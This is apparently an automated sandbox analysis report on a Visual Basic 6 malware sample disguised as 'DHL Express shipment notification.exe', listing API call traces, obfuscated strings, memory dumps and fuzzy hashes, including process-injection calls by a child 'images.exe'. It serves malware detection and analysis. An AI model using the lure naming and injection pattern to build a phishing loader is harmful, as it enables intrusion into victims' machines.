__vbaFreeStr.MSVBVM60(0041FF91,?,?,?,?,?,?,00401546), ref: 0041FF7B
__vbaFreeStr.MSVBVM60(0041FF91,?,?,?,?,?,?,00401546), ref: 0041FF83
__vbaFreeStr.MSVBVM60(0041FF91,?,?,?,?,?,?,00401546), ref: 0041FF8B

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CopyMove$#554#612Chkstk
String ID:
API String ID: 3453574145-0
Opcode ID: 1a4b8d5b6b5250ccad47a608e351ad77b3903580ae7d1bfea7bee8f21abe1dc1
Instruction ID: d2cc51361f4f27c508c3ed615b46d83e740902005361d3b9217bebafc60b9dac
Opcode Fuzzy Hash: 1a4b8d5b6b5250ccad47a608e351ad77b3903580ae7d1bfea7bee8f21abe1dc1
Instruction Fuzzy Hash: 4E11FA31900149ABCB00FFA2C886EDEB774BF05708F50853AB501771E1EB3CAA06CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00421347, Relevance: 13.6, APIs: 9, Instructions: 53COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421363
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0042138D
#698.MSVBVM60(?,00005745,?,?,?,?,00401546), ref: 0042139B
#520.MSVBVM60(?,?,?,00005745,?,?,?,?,00401546), ref: 004213A8
__vbaStrVarMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 004213B1
__vbaStrMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 004213BB
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,00005745,?,?,?,?,00401546), ref: 004213CA
__vbaFreeStr.MSVBVM60(00421403), ref: 004213F5
__vbaFreeStr.MSVBVM60(00421403), ref: 004213FD

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#520#698ChkstkCopyList
String ID:
API String ID: 415313431-0
Opcode ID: 8f7edf635c664b4903e7fe1205321c19f2f759a03192128100c750ad3c64068d
Instruction ID: acf9ba7a7808b8ee63fb7510f00659877307760c796ccb4f7fcb451105fc7c9b
Opcode Fuzzy Hash: 8f7edf635c664b4903e7fe1205321c19f2f759a03192128100c750ad3c64068d
Instruction Fuzzy Hash: 9F11EF72D00218ABCB00FF91DD86EEEB7BCBF44748F54842AF501A71A1EB789605CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041F821, Relevance: 13.6, APIs: 9, Instructions: 50COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F83D
#707.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F865
__vbaStrMove.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F86F
#593.MSVBVM60(0000000A), ref: 0041F88C
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041F897
#537.MSVBVM60(0000003B,0000000A), ref: 0041F89E
__vbaStrMove.MSVBVM60(0000003B,0000000A), ref: 0041F8A8
__vbaFreeStr.MSVBVM60(0041F8CF,0000000C,00000000,?,?,?,?,00401546), ref: 0041F8C1
__vbaFreeStr.MSVBVM60(0041F8CF,0000000C,00000000,?,?,?,?,00401546), ref: 0041F8C9

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#537#593#707Chkstk
String ID:
API String ID: 2467297632-0
Opcode ID: 4c3784d49d30fa517d435da006b196bbc390b1e36b6f1799cc3846fb075db024
Instruction ID: 04e9fa2f50b4b9f221986749ddd16bcfecf36a641596b32815d4a5c3b84344d6
Opcode Fuzzy Hash: 4c3784d49d30fa517d435da006b196bbc390b1e36b6f1799cc3846fb075db024
Instruction Fuzzy Hash: 7411FE71940209ABDB01FBA1CC56BDE7BB4AF04748F14843AF501BB1E1DB789645CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041F1FB, Relevance: 12.0, APIs: 8, Instructions: 48COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F217
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F241
__vbaFPFix.MSVBVM60(?,?,?,?,00401546), ref: 0041F254
#536.MSVBVM60(00000005), ref: 0041F267
__vbaStrMove.MSVBVM60(00000005), ref: 0041F271
__vbaFreeVar.MSVBVM60(00000005), ref: 0041F279
__vbaFreeStr.MSVBVM60(0041F2A0,00000005), ref: 0041F292
__vbaFreeStr.MSVBVM60(0041F2A0,00000005), ref: 0041F29A

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#536ChkstkCopyMove
String ID:
API String ID: 983360083-0
Opcode ID: 392090959a8b571694f60aab22cf4d63e7c94f7ff6f91e36fb8e713515f0db2a
Instruction ID: 69f99529d19ca589f3af9cb6ca5ca592279d261b525a69df8d7a3d959fa8e6d6
Opcode Fuzzy Hash: 392090959a8b571694f60aab22cf4d63e7c94f7ff6f91e36fb8e713515f0db2a
Instruction Fuzzy Hash: F8113C35800209ABCB00FFA5C846BEE7BB4AF05748F50806AF401771E1DB3D9A458B59

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: DHL Express shipment notification.exe PID: 6632 Parent PID: 8720 DHL Express shipment notification.exeCOMMON

Executed Functions

Function 01677618, Relevance: 1.6, APIs: 1, Instructions: 86threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 01677734

Memory Dump Source

Source File: 0000000E.00000002.1020146602.0000000001677000.00000040.00000001.sdmp, Offset: 01677000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: a77ef5d45240ff19b5b5f31402a233e4ab0fa440328f868cc4bbe94874ed5ac2
Instruction ID: 6c70a68d3027948164bebf2e9affb55e75ebb3d6b5c08a59494635fac8e5e6bb
Opcode Fuzzy Hash: a77ef5d45240ff19b5b5f31402a233e4ab0fa440328f868cc4bbe94874ed5ac2
Instruction Fuzzy Hash: AC310434904342CFEB249F6CCC9DBA577A2AF50260F598169CC858F6A2D3358BD5CB02

Uniqueness

Uniqueness Score: -1.00%

Function 016776D4, Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 01677734

Memory Dump Source

Source File: 0000000E.00000002.1020146602.0000000001677000.00000040.00000001.sdmp, Offset: 01677000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 906ab7d5f73e5949d6deaded26eaeeb25110251efcbf4347816a1d51e233c42c
Instruction ID: dda4383bbde9b9266e34a6d16ddc246c8dd7c84a0d88b806097ab0aacd81006c
Opcode Fuzzy Hash: 906ab7d5f73e5949d6deaded26eaeeb25110251efcbf4347816a1d51e233c42c
Instruction Fuzzy Hash: D321F434904342CFEB25AF6CCC9DBA5B7A2EF40664F05816DC8858F2A6D33487E5CB02

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: images.exe PID: 3256 Parent PID: 6632 images.exeCOMMON

Executed Functions

Function 0228AA34, Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 676nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02291E98: LoadLibraryA.KERNELBASE(6E6E1DCF), ref: 02291FF5

NtWriteVirtualMemory.NTDLL(?,962EDDA6,?,00000000,?,?,?,?,1D618A07), ref: 0228C540

Strings

A\, xrefs: 0228B58C
iB, xrefs: 0228BFBF
=mt, xrefs: 0228C3EF
f8@, xrefs: 0228AF59
iH,, xrefs: 0228AC73
ndKU, xrefs: 0228B33E

Memory Dump Source

Source File: 00000015.00000002.1170292211.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: =mt$A\$f8@$iB$iH,$ndKU
API String ID: 3569954152-3678086259
Opcode ID: 77885b2702c04a51ce225823af00551d34a069ace933f4d0d6b63e50d1a11d89
Instruction ID: 48d27b47fe4cc4f0fd641f729a0d3c2d0331091d494889b2c19119319e8cdeb1
Opcode Fuzzy Hash: 77885b2702c04a51ce225823af00551d34a069ace933f4d0d6b63e50d1a11d89
Instruction Fuzzy Hash: 2C52EA72614389DFCB689F74C9457EABBA2FF95300F41812EDC899B218D3749A81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0228D8CF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02291E98: LoadLibraryA.KERNELBASE(6E6E1DCF), ref: 02291FF5

NtAllocateVirtualMemory.NTDLL ref: 0228DC5B

Strings

b, xrefs: 0228DCA5

Memory Dump Source

Source File: 00000015.00000002.1170292211.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: b
API String ID: 2616484454-1908338681
Opcode ID: 5a74d96dd7eb3eb2156101d47bc90b3b7d235efe4d249214a81b6a9f78c64601
Instruction ID: 47b51765f540f55792fc4485f11ed351ec450725cddc3e8b9cbafa0d77e3be65
Opcode Fuzzy Hash: 5a74d96dd7eb3eb2156101d47bc90b3b7d235efe4d249214a81b6a9f78c64601
Instruction Fuzzy Hash: DC41CFB1658348CFDB38AF78C8957EE7BA1AF44344F41451DEC8A9A294C370CA85CB06

Uniqueness

Uniqueness Score: -1.00%

Function 022960AF, Relevance: 3.1, APIs: 2, Instructions: 79librarynativeCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(6E6E1DCF), ref: 02291FF5
NtProtectVirtualMemory.NTDLL(27B6936B,?,?,?,?,02294CB5,-2CCC98DA,0228AC9D,-00000001B24B832E), ref: 022962C3

Memory Dump Source

Source File: 00000015.00000002.1170292211.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: c78046f0f45d7a13534261a470cb85dda0fc4b050cc8623293135df2d3320cf6
Instruction ID: b216e0be1465f17aca5e5c59d3910cc28dac86d9efab596fe271ce0fb3cd1bb1
Opcode Fuzzy Hash: c78046f0f45d7a13534261a470cb85dda0fc4b050cc8623293135df2d3320cf6
Instruction Fuzzy Hash: 22317CB1A5029DEFDF30CFA8CD54BEA77A6EB98310F05416AAC089B204D7B05B00CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02296860, Relevance: 1.7, APIs: 1, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1170292211.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b418d373dc85d6dcd85b853f7820309415da8047303d8be7d01af1e6a14fa91e
Instruction ID: 71c4f7d13cc86149c13d94b4a3b1c1e91c305a4d72f01cd447726a8657861e03
Opcode Fuzzy Hash: b418d373dc85d6dcd85b853f7820309415da8047303d8be7d01af1e6a14fa91e
Instruction Fuzzy Hash: EF61E4B1624389CFDF39DE64C9A87EA7BB6AF95300F95411ACC0E8B258C7309A41CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0041C6C4, Relevance: 375.8, APIs: 174, Strings: 40, Instructions: 1267COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041C6E2
__vbaAryConstruct2.MSVBVM60(?,004029AC,00000002,?,?,?,?,00401546), ref: 0041C71C
__vbaVarDup.MSVBVM60 ref: 0041C741
#522.MSVBVM60(?,?), ref: 0041C754
__vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C767
#713.MSVBVM60(00000000,?,?,?,?), ref: 0041C76D
#558.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C789
__vbaFreeStr.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C7A3
__vbaFreeVarList.MSVBVM60(00000003,?,?,00000008,00000008,00000000,?,?,?,?), ref: 0041C7BF
#541.MSVBVM60(?,7:7:7,?,?,?,00401546), ref: 0041C7E2
__vbaStrVarMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C7EE
__vbaStrMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C7F8
__vbaFreeVar.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C803
__vbaVarDup.MSVBVM60 ref: 0041C828
#524.MSVBVM60(?,?), ref: 0041C83B
__vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C84E
#690.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C863
__vbaFreeStr.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C86E
__vbaFreeVarList.MSVBVM60(00000002,?,?,multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C883
#610.MSVBVM60(?,?,?,?,00401546), ref: 0041C892
#661.MSVBVM60(?,0040251C,?,?,?,?,?,?,?,00401546), ref: 0041C8B5
__vbaVarTstGe.MSVBVM60(00008002,?), ref: 0041C8DC
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?), ref: 0041C8F8
#705.MSVBVM60(00000002,00000000), ref: 0041C928
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041C932
__vbaFreeVar.MSVBVM60(00000002,00000000), ref: 0041C93D
#670.MSVBVM60(00000002,00000002,00000000), ref: 0041C949
__vbaStrVarMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C955
__vbaStrMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C95F
__vbaFreeVar.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C96A
__vbaVarDup.MSVBVM60 ref: 0041C98F
#560.MSVBVM60(?), ref: 0041C99B
__vbaFreeVar.MSVBVM60(?), ref: 0041C9B8
#648.MSVBVM60(0000000A,?), ref: 0041C9F8
__vbaFreeVar.MSVBVM60(0000000A,?), ref: 0041CA0F
__vbaVarDup.MSVBVM60(0000000A,?), ref: 0041CA70
#606.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041CA7E
__vbaStrMove.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041CA8B
__vbaLenBstr.MSVBVM60(00000000,00000010,0000000A,0000000A,?), ref: 0041CA91
#574.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041CAAD
__vbaStrMove.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041CABA
#696.MSVBVM60(00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041CAC0
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041CAE2
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CAFA
#648.MSVBVM60(0000000A), ref: 0041CB4A
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041CB62
#696.MSVBVM60(OFFENTLIGHEDSSFRE,0000000A), ref: 0041CB99
#696.MSVBVM60(Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041CBDD
__vbaNew2.MSVBVM60(0040259C,004223C0,Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041CC02
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014), ref: 0041CC67
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,00000070), ref: 0041CCC3
__vbaFreeObj.MSVBVM60(00000000,?,004025AC,00000070), ref: 0041CCE8
#519.MSVBVM60(tilskrersaksene,?), ref: 0041CCF2
__vbaStrMove.MSVBVM60(tilskrersaksene,?), ref: 0041CCFF
#519.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041CD05
__vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041CD12
__vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041CD36
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041CD76
#648.MSVBVM60(0000000A), ref: 0041CD99
__vbaStrCopy.MSVBVM60 ref: 0041CDB9
__vbaFreeStr.MSVBVM60 ref: 0041CE1D
__vbaFreeVar.MSVBVM60 ref: 0041CE28
#527.MSVBVM60(Forretningsbrevet5), ref: 0041CE3C
__vbaStrMove.MSVBVM60(Forretningsbrevet5), ref: 0041CE49
__vbaFreeStr.MSVBVM60 ref: 0041CE6A
__vbaStrCopy.MSVBVM60 ref: 0041CE7A
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,000006F8), ref: 0041CEC2
__vbaStrMove.MSVBVM60(00000000,00401260,00402340,000006F8), ref: 0041CEF2
__vbaFreeStr.MSVBVM60(00000000,00401260,00402340,000006F8), ref: 0041CEFD
#535.MSVBVM60(00000000,00401260,00402340,000006F8), ref: 0041CF02
#564.MSVBVM60(00000004,?), ref: 0041CF31
__vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041CF4B
#685.MSVBVM60(00000004,?), ref: 0041CF5F
__vbaObjSet.MSVBVM60(?,00000000,00000004,?), ref: 0041CF6C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040264C,0000001C), ref: 0041CFB3
__vbaI4Var.MSVBVM60(?), ref: 0041CFE2
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,000006FC), ref: 0041D04E
__vbaFreeObj.MSVBVM60(00000000,00401260,00402340,000006FC), ref: 0041D068
__vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 0041D07D
#537.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041D08A
__vbaStrMove.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041D097
#696.MSVBVM60(00000000,0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041D09D
#648.MSVBVM60(0000000A), ref: 0041D0C4
__vbaR8FixI4.MSVBVM60(0000000A), ref: 0041D0D6
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000700), ref: 0041D14C
__vbaFreeStr.MSVBVM60(00000000,00401260,00402340,00000700), ref: 0041D166
__vbaFreeVar.MSVBVM60(00000000,00401260,00402340,00000700), ref: 0041D171
#648.MSVBVM60(0000000A), ref: 0041D191
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000704), ref: 0041D1E7
__vbaFreeVar.MSVBVM60(00000000,00401260,00402340,00000704), ref: 0041D201
#648.MSVBVM60(0000000A), ref: 0041D221
#714.MSVBVM60(?,00000004,00000000,0000000A), ref: 0041D253
#648.MSVBVM60(0000000A,?,00000004,00000000,0000000A), ref: 0041D273
#564.MSVBVM60(00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D2A3
__vbaHresultCheck.MSVBVM60(00000000,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D2BD
__vbaI4Var.MSVBVM60(?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D2F0
__vbaI4Var.MSVBVM60(?,?,?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D309
__vbaFreeVarList.MSVBVM60(00000006,0000000A,00000004,0000000A,00000004,?,?), ref: 0041D37A
#581.MSVBVM60(eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D387
#713.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D397
__vbaStrMove.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D3A4
__vbaFpI4.MSVBVM60 ref: 0041D3C2
__vbaStrCopy.MSVBVM60 ref: 0041D3D8
__vbaStrMove.MSVBVM60(Benefact6,?), ref: 0041D3F5
__vbaStrMove.MSVBVM60 ref: 0041D436
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041D452
#696.MSVBVM60(ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D45F
#574.MSVBVM60(00000003), ref: 0041D486
__vbaStrMove.MSVBVM60(00000003), ref: 0041D493
__vbaR8IntI4.MSVBVM60(00000003), ref: 0041D49E
__vbaLenBstrB.MSVBVM60(Whiskysourens1,?,?,?), ref: 0041D4DB
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000708), ref: 0041D518
__vbaFreeStr.MSVBVM60(00000000,00401260,00402340,00000708), ref: 0041D532
__vbaFreeVar.MSVBVM60(00000000,00401260,00402340,00000708), ref: 0041D53D
#696.MSVBVM60(Kainsmrkernes3), ref: 0041D547
__vbaStrCopy.MSVBVM60 ref: 0041D5C6
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,0000070C), ref: 0041D624
__vbaFreeStr.MSVBVM60(00000000,00401260,00402340,0000070C), ref: 0041D63E
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000710), ref: 0041D69F
__vbaVarDup.MSVBVM60(00000000,00401260,00402340,00000710), ref: 0041D6D3
#607.MSVBVM60(?,00000065,00000003), ref: 0041D6E8
__vbaStrVarMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D6F4
__vbaStrMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D701
__vbaStrCopy.MSVBVM60(?,?,00000065,00000003), ref: 0041D711
__vbaLenBstrB.MSVBVM60(Udstillingslokalet,?,?,000FFFC6,005EA767,?,?,00000065,00000003), ref: 0041D747
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041D787
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000), ref: 0041D79F
#705.MSVBVM60(00000002,00000000), ref: 0041D7C4
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041D7D1
__vbaLenBstrB.MSVBVM60(00000000,00000002,00000000), ref: 0041D7D7
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000714), ref: 0041D812
__vbaFreeStr.MSVBVM60(00000000,00401260,00402340,00000714), ref: 0041D82C
__vbaFreeVar.MSVBVM60(00000000,00401260,00402340,00000714), ref: 0041D837
__vbaLenBstr.MSVBVM60(Generalisations7), ref: 0041D841
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000718), ref: 0041D894
#525.MSVBVM60(00000067), ref: 0041D8B3
__vbaStrMove.MSVBVM60(00000067), ref: 0041D8C0
#618.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D8CC
__vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D8D9
__vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D8FD
__vbaStrCopy.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D920
__vbaStrMove.MSVBVM60(?,SOLITRSKAKKEN,Indvi2,Fdres,?,STRUTTENDE,00000017,00000067), ref: 0041D94E
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,0000071C), ref: 0041D98B
__vbaStrMove.MSVBVM60(00000000,00401260,00402340,0000071C), ref: 0041D9BB
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0041D9E5
#564.MSVBVM60(00000005,?), ref: 0041DA1D
__vbaHresultCheck.MSVBVM60(00000000), ref: 0041DA37
#541.MSVBVM60(?,16:16:16), ref: 0041DA57
__vbaStrVarVal.MSVBVM60(?,?,?,16:16:16), ref: 0041DA6A
#519.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041DA70
__vbaStrMove.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041DA7D
#648.MSVBVM60(0000000A,00000000,?,?,?,16:16:16), ref: 0041DA9D
__vbaStrMove.MSVBVM60(?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041DAE9
__vbaI4Var.MSVBVM60(?,00000000,?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041DAF6
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000720), ref: 0041DB2C
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041DB62
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0041DB88
#696.MSVBVM60(00402900), ref: 0041DB95
#696.MSVBVM60(00402948,00402900), ref: 0041DBA6
__vbaStrCopy.MSVBVM60(00402948,00402900), ref: 0041DBBD
__vbaFreeStr.MSVBVM60 ref: 0041DC03
__vbaVarMove.MSVBVM60 ref: 0041DC2A
__vbaVarMove.MSVBVM60 ref: 0041DC4C
__vbaVarIdiv.MSVBVM60(?,?,?), ref: 0041DC60
__vbaI4Var.MSVBVM60(00000000,?,?,?), ref: 0041DC66
__vbaFreeVar.MSVBVM60(0041DD58), ref: 0041DD00
__vbaFreeStr.MSVBVM60(0041DD58), ref: 0041DD08
__vbaAryDestruct.MSVBVM60(00000000,?,0041DD58), ref: 0041DD1F
__vbaFreeStr.MSVBVM60(00000000,?,0041DD58), ref: 0041DD27
__vbaFreeStr.MSVBVM60(00000000,?,0041DD58), ref: 0041DD2F
__vbaFreeStr.MSVBVM60(00000000,?,0041DD58), ref: 0041DD37
__vbaFreeStr.MSVBVM60(00000000,?,0041DD58), ref: 0041DD3F
__vbaFreeVar.MSVBVM60(00000000,?,0041DD58), ref: 0041DD47
__vbaFreeStr.MSVBVM60(00000000,?,0041DD58), ref: 0041DD52

Strings

DUMBFISH, xrefs: 0041D915
RODTEGNENES, xrefs: 0041D392
Kainsmrkernes3, xrefs: 0041D542
SELVFINANSIEREDES, xrefs: 0041DBE4
Paucify9, xrefs: 0041D3CD
Dagvagten, xrefs: 0041CBD8
Lersernes, xrefs: 0041D1AB
7:7:7, xrefs: 0041C7D6
Benefact6, xrefs: 0041D3E4
eudaemonistical, xrefs: 0041D382
Whiskysourens1, xrefs: 0041D4D6
Admiraliteternes1, xrefs: 0041CDAE
tril, xrefs: 0041D30F
OFFENTLIGHEDSSFRE, xrefs: 0041CB94
Odontoma7, xrefs: 0041D5EF
Skovteknikeren6, xrefs: 0041DBB2
16:16:16, xrefs: 0041DA4B
Bursati, xrefs: 0041C859
multivalent, xrefs: 0041C85E
CANNIBALEAN, xrefs: 0041C854
Vidnefast, xrefs: 0041CE6F
blaarv, xrefs: 0041D110
ADMIRINGLY, xrefs: 0041D45A
centralregeringens, xrefs: 0041D5BB
SOLITRSKAKKEN, xrefs: 0041D936
Utrecht8, xrefs: 0041D66A
Udstillingslokalet, xrefs: 0041D742
ASCRY, xrefs: 0041D706
replicr, xrefs: 0041C96F
Generalisations7, xrefs: 0041D83C
Fdres, xrefs: 0041D92C
STRUTTENDE, xrefs: 0041D8C7
Snoreskrternes8, xrefs: 0041D31B
Readjust, xrefs: 0041C808
Indvi2, xrefs: 0041D931
Forretningsbrevet5, xrefs: 0041CE37
tilskrersaksene, xrefs: 0041CCED
=9, xrefs: 0041D5A9
undrede, xrefs: 0041D5EA
Hjortens, xrefs: 0041C721

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$List$#648#696$Copy$Bstr$#519#564$#541#574#705#713$#522#524#525#527#535#537#558#560#581#606#607#610#618#661#670#685#690#714ChkstkConstruct2DestructIdivNew2
String ID: 16:16:16$7:7:7$=9$ADMIRINGLY$ASCRY$Admiraliteternes1$Benefact6$Bursati$CANNIBALEAN$DUMBFISH$Dagvagten$Fdres$Forretningsbrevet5$Generalisations7$Hjortens$Indvi2$Kainsmrkernes3$Lersernes$OFFENTLIGHEDSSFRE$Odontoma7$Paucify9$RODTEGNENES$Readjust$SELVFINANSIEREDES$SOLITRSKAKKEN$STRUTTENDE$Skovteknikeren6$Snoreskrternes8$Udstillingslokalet$Utrecht8$Vidnefast$Whiskysourens1$blaarv$centralregeringens$eudaemonistical$multivalent$replicr$tilskrersaksene$tril$undrede
API String ID: 1918163132-2023598156
Opcode ID: 9d686f8c3daf2795f549159a0ecb804572eb615873d9349ef6c38574d8506ea0
Instruction ID: 4f597cf3ee989f2d3e6e7cc483b1ea7435433e21d18263570a5c1f8dfc7ea310
